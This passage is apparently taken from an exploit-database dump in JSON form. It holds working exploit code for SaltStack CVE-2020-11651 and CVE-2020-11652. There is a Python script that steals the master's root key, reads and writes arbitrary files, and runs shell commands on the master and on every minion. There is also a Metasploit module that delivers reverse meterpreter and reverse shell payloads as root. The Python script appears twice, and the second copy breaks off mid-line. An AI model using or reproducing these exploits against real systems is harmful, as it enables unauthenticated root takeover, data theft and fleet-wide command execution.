unicode_literals\r\nimport argparse\r\nimport datetime\r\nimport os\r\nimport os.path\r\nimport sys\r\nimport time\r\n\r\nimport salt\r\nimport salt.version\r\nimport salt.transport.client\r\nimport salt.exceptions\r\n\r\ndef init_minion(master_ip, master_port):\r\n minion_config = {\r\n 'transport': 'zeromq',\r\n 'pki_dir': '/tmp',\r\n 'id': 'root',\r\n 'log_level': 'debug',\r\n 'master_ip': master_ip,\r\n 'master_port': master_port,\r\n 'auth_timeout': 5,\r\n 'auth_tries': 1,\r\n 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\r\n }\r\n\r\n return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\r\n\r\n# --- check funcs ----\r\n\r\ndef check_salt_version():\r\n print(\"[+] Salt version: {}\".format(salt.version.__version__))\r\n\r\n vi = salt.version.__version_info__\r\n\r\n if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):\r\n return True\r\n else:\r\n return False\r\n\r\ndef check_connection(master_ip, master_port, channel):\r\n print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\r\n sys.stdout.flush()\r\n\r\n # connection check\r\n try:\r\n channel.send({'cmd':'ping'}, timeout=2)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"OFFLINE\")\r\n sys.exit(1)\r\n else:\r\n print(\"ONLINE\")\r\n\r\ndef check_CVE_2020_11651(channel):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='')\r\n sys.stdout.flush()\r\n # try to evil\r\n try:\r\n rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"YES\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n pass\r\n finally:\r\n if rets:\r\n root_key = rets[2]['root']\r\n return root_key\r\n\r\n return None\r\n\r\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'cmd': 'get_token',\r\n 'arg': [],\r\n 'token': top_secret_file_path,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"YES\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n print(\"NO\")\r\n \r\ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': top_secret_file_path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return']:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'data': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n\r\n pp(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'config.update_config',\r\n 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'yaml_contents': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652.conf')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef pwn_read_file(channel, root_key, path, master_ip):\r\n print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print(rets['data']['return'][0][path])\r\n\r\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\r\n print(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip))\r\n sys.stdout.flush()\r\n\r\n try:\r\n fh = open(src, 'rb')\r\n payload = fh.read()\r\n fh.close()\r\n except Exception as e:\r\n print('[-] Failed to read {}: {}'.format(src, e))\r\n return\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'saltenv': 'base',\r\n 'data': payload,\r\n 'path': dest,\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print('[ ] {}'.format(rets['data']['return']))\r\n\r\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'runner',\r\n 'fun': 'salt.cmd',\r\n 'saltenv': 'base',\r\n 'user': 'sudo_user',\r\n 'kwarg': {\r\n 'fun': 'cmd.exec_code',\r\n 'lang': 'python',\r\n 'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\r\n },\r\n 'jid': jid,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n\r\n if rets.get('jid'):\r\n print('[+] Successfully scheduled job: {}'.format(rets['jid']))\r\n\r\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': '_send_pub',\r\n 'fun': 'cmd.run',\r\n 'user': 'root',\r\n 'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\r\n 'tgt': '*',\r\n 'tgt_type': 'glob',\r\n 'ret': '',\r\n 'jid': jid\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n finally:\r\n if rets == None:\r\n print('[+] Successfully submitted job to all minions.')\r\n else:\r\n print('[-] Failed to submit job')\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')\r\n parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\r\n parser.add_argument('--port', '-p', dest='master_port', default='4506')\r\n parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\r\n parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')\r\n parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\r\n parser.add_argument('--read', '-r', dest='read_file')\r\n parser.add_argument('--upload-src', dest='upload_src')\r\n parser.add_argument('--upload-dest', dest='upload_dest')\r\n parser.add_argument('--exec', dest='exec', help='Run a command on the master')\r\n parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\r\n args = parser.parse_args()\r\n\r\n print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\")\r\n time.sleep(1)\r\n\r\n # Both src and destination are required for uploads\r\n if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\r\n print('[-] Must provide both --upload-src and --upload-dest')\r\n sys.exit(1)\r\n\r\n channel = init_minion(args.master_ip, args.master_port)\r\n\r\n if check_salt_version():\r\n print(\"[ ] This version of salt is vulnerable! Check results below\")\r\n elif args.force:\r\n print(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\")\r\n else:\r\n sys.exit()\r\n\r\n check_connection(args.master_ip, args.master_port, channel)\r\n \r\n root_key = check_CVE_2020_11651(channel)\r\n if root_key:\r\n print('\\n[*] root key obtained: {}'.format(root_key))\r\n else:\r\n print('[-] Failed to find root key...aborting')\r\n sys.exit(127)\r\n\r\n if args.run_checks:\r\n # Assuming this check runs on the master itself, create a file with \"secret\" content\r\n # and abuse CVE-2020-11652 to read it.\r\n top_secret_file_path = '/tmp/salt_cve_teta'\r\n with salt.utils.fopen(top_secret_file_path, 'w') as fd:\r\n fd.write(\"top secret\")\r\n\r\n # Again, this assumes we're running this check on the master itself\r\n with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\r\n root_key = keyfd.read()\r\n\r\n check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\r\n check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\r\n check_CVE_2020_11652_write1(debug, channel, root_key)\r\n check_CVE_2020_11652_write2(debug, channel, root_key)\r\n os.remove(top_secret_file_path)\r\n sys.exit(0)\r\n\r\n if args.read_file:\r\n pwn_read_file(channel, root_key, args.read_file, args.master_ip)\r\n\r\n if args.upload_src:\r\n if os.path.isabs(args.upload_dest):\r\n print('[-] Destination path must be relative; aborting')\r\n sys.exit(1)\r\n pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\r\n\r\n\r\n jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\r\n\r\n if args.exec:\r\n pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\r\n\r\n if args.exec_all:\r\n print(\"[!] Lester, is this what you want? Hit ^C to abort.\")\r\n time.sleep(2)\r\n pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34358"}, {"lastseen": "2020-07-19T20:16:39", "description": "This Metasploit module exploits unauthenticated access to the runner() and _send_pub() methods in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to execute code as root on either the master or on select minions. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.", "edition": 1, "published": "2020-05-12T00:00:00", "title": "SaltStack Salt Master/Minion Unauthenticated Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-12T00:00:00", "id": "1337DAY-ID-34423", "href": "https://0day.today/exploit/description/34423", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::ZeroMQ\r\n include Msf::Exploit::Remote::CheckModule\r\n include Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE',\r\n 'Description' => %q{\r\n This module exploits unauthenticated access to the runner() and\r\n _send_pub() methods in the SaltStack Salt master's ZeroMQ request\r\n server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to\r\n execute code as root on either the master or on select minions.\r\n\r\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are\r\n known to be affected by the Salt vulnerabilities.\r\n\r\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\r\n well as Vulhub's Docker image.\r\n },\r\n 'Author' => [\r\n 'F-Secure', # Discovery\r\n 'wvu' # Module\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\r\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\r\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\r\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\r\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\r\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\r\n ],\r\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['python', 'unix'],\r\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Master (Python payload)',\r\n 'Description' => 'Executing Python payload on the master',\r\n 'Type' => :python,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\r\n }\r\n ],\r\n [\r\n 'Master (Unix command)',\r\n 'Description' => 'Executing Unix command on the master',\r\n 'Type' => :unix_command,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\r\n }\r\n ],\r\n [\r\n 'Minions (Python payload)',\r\n 'Description' => 'Executing Python payload on the minions',\r\n 'Type' => :python,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\r\n }\r\n ],\r\n [\r\n 'Minions (Unix command)',\r\n 'Description' => 'Executing Unix command on the minions',\r\n 'Type' => :unix_command,\r\n 'DefaultOptions' => {\r\n # cmd/unix/reverse_python_ssl crashes in this target\r\n 'PAYLOAD' => 'cmd/unix/reverse_python'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0, # Defaults to master for safety\r\n 'DefaultOptions' => {\r\n 'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key'\r\n },\r\n 'Notes' => {\r\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\r\n }\r\n )\r\n )\r\n\r\n register_options([\r\n Opt::RPORT(4506),\r\n OptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', /.*/])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10])\r\n ])\r\n\r\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\r\n import_target_defaults\r\n end\r\n\r\n # NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key\r\n\r\n def exploit\r\n # check.reason is from auxiliary/gather/saltstack_salt_root_key\r\n if target.name.start_with?('Master')\r\n unless (root_key = check.reason)\r\n fail_with(Failure::BadConfig,\r\n \"#{target['Description']} requires a root key\")\r\n end\r\n\r\n print_good(\"Successfully obtained root key: #{root_key}\")\r\n end\r\n\r\n # These are from Msf::Exploit::Remote::ZeroMQ\r\n zmq_connect\r\n zmq_negotiate\r\n\r\n print_status(\"#{target['Description']}: #{datastore['PAYLOAD']}\")\r\n\r\n case target.name\r\n when /^Master/\r\n yeet_runner(root_key)\r\n when /^Minions/\r\n yeet_send_pub\r\n end\r\n\r\n # HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one\r\n sleep(wfs_delay)\r\n rescue EOFError, Rex::ConnectionError => e\r\n print_error(\"#{e.class}: #{e.message}\")\r\n ensure\r\n # This is from Msf::Exploit::Remote::ZeroMQ\r\n zmq_disconnect\r\n end\r\n\r\n def yeet_runner(root_key)\r\n print_status(\"Yeeting runner() at #{peer}\")\r\n\r\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951\r\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951\r\n runner = {\r\n 'cmd' => 'runner',\r\n # https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd\r\n 'fun' => 'salt.cmd',\r\n 'kwarg' => {\r\n 'hide_output' => true,\r\n 'ignore_retcode' => true,\r\n 'output_loglevel' => 'quiet'\r\n },\r\n 'user' => 'root', # This is NOT the Unix user!\r\n 'key' => root_key # No JID needed, only the root key!\r\n }\r\n\r\n case target['Type']\r\n when :python\r\n vprint_status(\"Executing Python code: #{payload.encoded}\")\r\n\r\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\r\n runner['kwarg'].merge!(\r\n 'fun' => 'cmd.exec_code',\r\n 'lang' => payload.arch.first,\r\n 'code' => payload.encoded\r\n )\r\n when :unix_command\r\n # HTTPS doesn't appear to be supported by the server :(\r\n print_status(\"Serving intermediate stager over HTTP: #{start_service}\")\r\n\r\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\r\n\r\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script\r\n runner['kwarg'].merge!(\r\n # cmd.run doesn't work due to a missing argument error, so we use this\r\n 'fun' => 'cmd.script',\r\n 'source' => get_uri,\r\n 'stdin' => payload.encoded\r\n )\r\n end\r\n\r\n vprint_status(\"Unserialized clear load: #{runner}\")\r\n zmq_send_message(serialize_clear_load(runner))\r\n\r\n unless (res = sock.get_once)\r\n fail_with(Failure::Unknown, 'Did not receive runner() response')\r\n end\r\n\r\n vprint_good(\"Received runner() response: #{res.inspect}\")\r\n end\r\n\r\n def yeet_send_pub\r\n print_status(\"Yeeting _send_pub() at #{peer}\")\r\n\r\n # NOTE: A unique JID (job ID) is needed for every published job\r\n jid = generate_jid\r\n\r\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151\r\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151\r\n send_pub = {\r\n 'cmd' => '_send_pub',\r\n 'kwargs' => {\r\n 'bg' => true,\r\n 'hide_output' => true,\r\n 'ignore_retcode' => true,\r\n 'output_loglevel' => 'quiet',\r\n 'show_jid' => false,\r\n 'show_timeout' => false\r\n },\r\n 'user' => 'root', # This is NOT the Unix user!\r\n 'tgt' => datastore['MINIONS'].source,\r\n 'tgt_type' => 'pcre',\r\n 'jid' => jid\r\n }\r\n\r\n case target['Type']\r\n when :python\r\n vprint_status(\"Executing Python code: #{payload.encoded}\")\r\n\r\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\r\n send_pub.merge!(\r\n 'fun' => 'cmd.exec_code',\r\n 'arg' => [payload.arch.first, payload.encoded]\r\n )\r\n when :unix_command\r\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\r\n\r\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run\r\n send_pub.merge!(\r\n 'fun' => 'cmd.run',\r\n 'arg' => [payload.encoded]\r\n )\r\n end\r\n\r\n vprint_status(\"Unserialized clear load: #{send_pub}\")\r\n zmq_send_message(serialize_clear_load(send_pub))\r\n\r\n unless (res = sock.get_once)\r\n fail_with(Failure::Unknown, 'Did not receive _send_pub() response')\r\n end\r\n\r\n vprint_good(\"Received _send_pub() response: #{res.inspect}\")\r\n\r\n # NOTE: This path will likely change between platforms and distros\r\n register_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\")\r\n end\r\n\r\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py\r\n # https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py\r\n def generate_jid\r\n DateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N')\r\n end\r\n\r\n # HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP\r\n def stager_instance\r\n nil\r\n end\r\n\r\n # HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP\r\n def exe\r\n # NOTE: The shebang line is necessary in this case!\r\n <<~SHELL\r\n #!/bin/sh\r\n /bin/sh\r\n SHELL\r\n end\r\n\r\nend\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34423"}, {"lastseen": "2020-07-19T18:03:19", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2020-05-07T00:00:00", "title": "Saltstack 3000.1 Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-07T00:00:00", "id": "1337DAY-ID-34389", "href": "https://0day.today/exploit/description/34389", "sourceData": "# Exploit Title: Saltstack 3000.1 - Remote Code Execution\r\n# Date: 2020-05-04\r\n# Exploit Author: Jasper Lievisse Adriaanse\r\n# Vendor Homepage: https://www.saltstack.com/\r\n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*\r\n# Tested on: Debian 10 with Salt 2019.2.0\r\n# CVE : CVE-2020-11651 and CVE-2020-11652\r\n# Discription: Saltstack authentication bypass/remote code execution\r\n#\r\n# Source: https://github.com/jasperla/CVE-2020-11651-poc\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\n#!/usr/bin/env python\r\n#\r\n# Exploit for CVE-2020-11651 and CVE-2020-11652\r\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\nfrom __future__ import absolute_import, print_function, unicode_literals\r\nimport argparse\r\nimport datetime\r\nimport os\r\nimport os.path\r\nimport sys\r\nimport time\r\n\r\nimport salt\r\nimport salt.version\r\nimport salt.transport.client\r\nimport salt.exceptions\r\n\r\ndef init_minion(master_ip, master_port):\r\n minion_config = {\r\n 'transport': 'zeromq',\r\n 'pki_dir': '/tmp',\r\n 'id': 'root',\r\n 'log_level': 'debug',\r\n 'master_ip': master_ip,\r\n 'master_port': master_port,\r\n 'auth_timeout': 5,\r\n 'auth_tries': 1,\r\n 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\r\n }\r\n\r\n return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\r\n\r\n# --- check funcs ----\r\n\r\ndef check_salt_version():\r\n print(\"[+] Salt version: {}\".format(salt.version.__version__))\r\n\r\n vi = salt.version.__version_info__\r\n\r\n if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):\r\n return True\r\n else:\r\n return False\r\n\r\ndef check_connection(master_ip, master_port, channel):\r\n print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\r\n sys.stdout.flush()\r\n\r\n # connection check\r\n try:\r\n channel.send({'cmd':'ping'}, timeout=2)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"OFFLINE\")\r\n sys.exit(1)\r\n else:\r\n print(\"ONLINE\")\r\n\r\ndef check_CVE_2020_11651(channel):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='')\r\n sys.stdout.flush()\r\n # try to evil\r\n try:\r\n rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"YES\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n pass\r\n finally:\r\n if rets:\r\n root_key = rets[2]['root']\r\n return root_key\r\n\r\n return None\r\n\r\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'cmd': 'get_token',\r\n 'arg': [],\r\n 'token': top_secret_file_path,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"YES\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n print(\"NO\")\r\n \r\ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': top_secret_file_path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return']:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'data': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n\r\n pp(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'config.update_config',\r\n 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'yaml_contents': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652.conf')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef pwn_read_file(channel, root_key, path, master_ip):\r\n print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print(rets['data']['return'][0][path])\r\n\r\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\r\n print(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip))\r\n sys.stdout.flush()\r\n\r\n try:\r\n fh = open(src, 'rb')\r\n payload = fh.read()\r\n fh.close()\r\n except Exception as e:\r\n print('[-] Failed to read {}: {}'.format(src, e))\r\n return\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'saltenv': 'base',\r\n 'data': payload,\r\n 'path': dest,\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print('[ ] {}'.format(rets['data']['return']))\r\n\r\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'runner',\r\n 'fun': 'salt.cmd',\r\n 'saltenv': 'base',\r\n 'user': 'sudo_user',\r\n 'kwarg': {\r\n 'fun': 'cmd.exec_code',\r\n 'lang': 'python',\r\n 'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\r\n },\r\n 'jid': jid,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n\r\n if rets.get('jid'):\r\n print('[+] Successfully scheduled job: {}'.format(rets['jid']))\r\n\r\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute '{}' on all minions connected to 